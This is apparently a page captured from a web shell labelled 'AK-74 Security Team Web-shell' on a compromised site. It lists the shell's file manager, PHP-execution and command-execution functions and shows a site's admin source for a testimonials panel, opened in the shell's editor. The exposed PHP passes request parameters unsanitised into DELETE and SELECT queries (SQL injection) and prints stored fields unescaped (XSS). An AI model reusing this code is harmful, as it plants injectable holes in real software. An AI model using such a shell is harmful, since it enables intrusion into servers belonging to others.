.:: :[ AK-74 Security Team Web-shell ]: ::.
General information
File manager
phpinfo()
Run PHP
Execute the command
Edit the file
<?php include_once 'inc/function.php'; include_once('inc/paginator.class.php'); $admin=new Admin(); $pages = new Paginator; $weburl=substr($_SERVER['QUERY_STRING'],strlen($_GET['page'])+15); $query = "SELECT * FROM `testimonials`"; $get_rows=$admin->get_rows_by_query($db,$query); $per_page=50; $start=($_GET['page']-1)*$per_page; $pagination = $pages->displayHtmlPages($_GET['page'],$get_rows,$per_page,$weburl); if(isset($_GET['action']) || isset($_GET['task'])){ if($_GET['action']=='delete'){ mysqli_query($db,"DELETE FROM `testimonials` WHERE id='".$_GET['id']."'"); $_SESSION['success']="Testimonials Deleted Successfully"; } if($_POST['action']=='edit'){ $response=$admin->edit_testimonials($db,$_POST); if($response){ $_SESSION['success']="Testimonials Updated Successfully"; } } if($_GET['task']=='edit'){ $result=mysqli_fetch_array(mysqli_query($db,"SELECT * FROM testimonials WHERE id='".$_GET['id']."'")); } } include_once 'inc/header.php'; ?> <div id="content" class="container-fluid"> <ol class="breadcrumb"> <li>Home</li> <li>Testimonials Management</li> <li>View Testimonials</li> </ol> <?php if(!empty($_SESSION['success'])) { ?> <div class="alert alert-success"> <strong>Success!</strong> <?=$_SESSION['success']?> </div> <?php unset($_SESSION['success']); } ?> <?php if(!empty($_GET['task']) && $_GET['task']=='view') { ?> <div class="panel panel-default"> <div class="panel-heading"> <div class="pull-right"> <a href="add-testimonials.php" class="btn btn-primary"><i class="fa fa-plus"></i></a> </div> <h1 class="panel-title"><i class="fa fa-comments"></i> View Testimonials</h1> </div> <div class="panel-body"> <form method="post" id="table-enquiry"> <div class="table-responsive"> <table class="table table-striped table-bordered table-hover"> <tr> <th class="text-left">S.No.</th> <th class="text-left">Name</th> <th class="text-left">City</th> <th class="text-left">Content</th> <th class="text-left">Status</th> <th class="text-right">Action</th> </tr> <?php $i=$start+1; $apps=$admin->get_filter_data_by_page_id($db,$query,$start,$per_page,'id','desc'); foreach($apps as $app): extract($app); ?> <tr> <td class="text-left"><?=$i?></td> <td class="text-left"><?=$name?></td> <td class="text-left"><?=$city?></td> <td class="text-left"><?=substr($content,0,50).'...'?></td> <td class="text-left"><?=$status?></td> <td class="text-right"> <a data-toggle="modal" data-target="#testimonials" onclick="get_testimonials(<?=$id?>)" class="btn btn-primary btn-xs"><span title="View" data-toggle="tooltip"><i class="fa fa-search"></i></span></a> <a href="view-testimonials.php?task=edit&id=<?=$id?>" class="btn btn-success btn-xs" title="Edit" data-toggle="tooltip"><i class="fa fa-pencil"></i></a> <a href="javascript:void(0)" onClick="deleteAction(<?=$id?>)" title="Delete" data-toggle="tooltip" class="btn btn-danger btn-xs"><i class="fa fa-times"></i></a> </td> </tr> <?php $i++; endforeach; ?> <?php if($get_rows==0){ ?> <tr> <td class="text-center danger" colspan="6"><p> </p><h4>Sorry, No Data Found</h4></td> </tr> <?php } ?> </table> <center> <ul class="pagination"> <?php print_r($pagination); ?> </ul> </center> </div> </form> </div> </div> <?php } if(!empty($_GET['task']) && $_GET['task']=='edit') { ?> <div class="panel panel-default"> <div class="panel-heading"> <div class="pull-right"> <button type="submit" form="form-testimonials" title="Save" data-toggle="tooltip" class="btn btn-success"><i class="fa fa-save"></i></button> <a href="view-testimonials.php?task=view&page=1" title="Cancel" data-toggle="tooltip" class="btn btn-danger"><i class="fa fa-times"></i></a> </div> <h1 class="panel-title"><i class="fa fa-comments"></i> Edit Testimonials</h1> </div> <div class="panel-body"> <form method="post" id="form-testimonials" class="form-horizontal"><br> <input type="hidden" name="action" value="edit"> <input type="hidden" name="id" value="<?=$result['id']?>"> <div class="form-group"> <label class="col-sm-2 control-label">Name</label> <div class="col-sm-10"> <input type="text" name="name" class="form-control" value="<?=$result['name']?>"> </div> </div> <div class="form-group"> <label class="col-sm-2 control-label">City</label> <div class="col-sm-10"> <input type="text" name="city" class="form-control" value="<?=$result['city']?>"> </div> </div> <div class="form-group"> <label class="col-sm-2 control-label">Content</label> <div class="col-sm-10"> <textarea name="content" class="form-control" rows="5"><?=$result['content']?></textarea> </div> </div> <div class="form-group"> <label class="col-sm-2 control-label">Status</label> <div class="col-sm-10"> <select name="status" class="form-control"> <option value="Active" <?php if($result['status']=='Active'){ echo 'selected'; } ?>>Active</option> <option value="Inactive" <?php if($result['status']=='Inactive'){ echo 'selected'; } ?>>In Active</option> </select> </div> </div> </form> </div> </div> <?php } ?> </div> <!-- Modal --> <div id="testimonials" class="modal fade" role="dialog"> <div class="modal-dialog"> <div class="modal-content" id="testimonialsSuccess"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal">×</button> </div> <div class="modal-body"> <p>Please wait...</p> </div> </div> </div> </div> <?php include_once 'inc/footer.php'; ?> <script> function get_testimonials(id) { if (id.length != 0) { var xmlhttp = new XMLHttpRequest(); xmlhttp.onreadystatechange = function() { if (xmlhttp.readyState == 4 && xmlhttp.status == 200) { document.getElementById("testimonialsSuccess").innerHTML = xmlhttp.responseText; } } xmlhttp.open("GET", "ajax-data.php?task=get-testimonials&id="+id, true); xmlhttp.send(); } } </script> <script type="text/javascript"> function deleteAction(id){ var confirmmessage = "Are you sure you wish to proceed?"; var goifokay = "<?=ADMINURL?>/view-testimonials.php?task=view&page=1&action=delete&id="+id; if (window.confirm(confirmmessage)){ window.location = goifokay; } else { return false; } } </script> <script type="text/javascript" src="<?=ADMINURL?>/js/system.js"></script>
Rename:
-